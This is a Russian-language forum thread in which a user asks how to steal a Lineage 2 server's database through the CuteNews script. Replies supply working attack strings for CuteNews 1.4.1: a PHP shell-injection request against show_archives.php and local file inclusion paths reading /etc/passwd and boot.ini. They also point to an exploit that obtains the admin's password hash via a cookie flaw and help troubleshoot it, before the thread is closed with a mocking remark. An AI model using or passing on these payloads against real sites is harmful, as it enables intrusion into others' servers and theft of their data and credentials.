Пипл плс не удаляйте тему, ищу поиском нечё толкового ненаходит Как можно через CuteNews угнать базу (допустим сервака ла2) помогите плс... Заранее спс!
CuteNews 1.4.1 Shell Injection show_archives.php ?template=../inc/ipban.mdu%00&member_db[1]=1&action=add&add_ip=%22%3C?php%20echo%20md5(%22test%22) ;%20die;?%3E.%22%20HTTP/1.0\r\n Cute News 1.4.1 Local File Inclusion show_archives.php?template=../../../../../../../../../../etc/passwd%00 show_archives.php?template=../../../../../../../../../../boot.ini%00 Попробуй мож получиться
Уязвимость по которой можно получить доступ к главной страничке кто знает что это такое админка там в _http://sayt-l2-moyweb/news/ Эксплойты на узнавание ника и хеша пароля _http://www.waraxe.us/tools/ Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на целевой системе. Уязвимость существует из-за ошибки, позволяющей получить MD5 хэш администратора, с использованием $_COOKIE. Атакующий может получить несанкционированный доступ к конфиденциальной информации на целевой системе.
Хммм...указал я путь до search.php А какой ник вводить в эксплойте? И когда запускаю эксплойт то он мне пишет:
А собственно зачем тебе вообще это всё нужно, если ты даже не знаешь что делает эксплойт который ты юзаешь? Помоему оно тебе просто не нужно. Он тебе пишет что функция не инициализирована. Это наверное потому что ты не поставил бибилиотеку с Курлом - поставь бибилотеку - будет работать. P.S. закрыто. P.P.S. вообще классная тема, звучит как "плиз, сломайте за меня, а то я ничего не умею делать, но очень хочется".
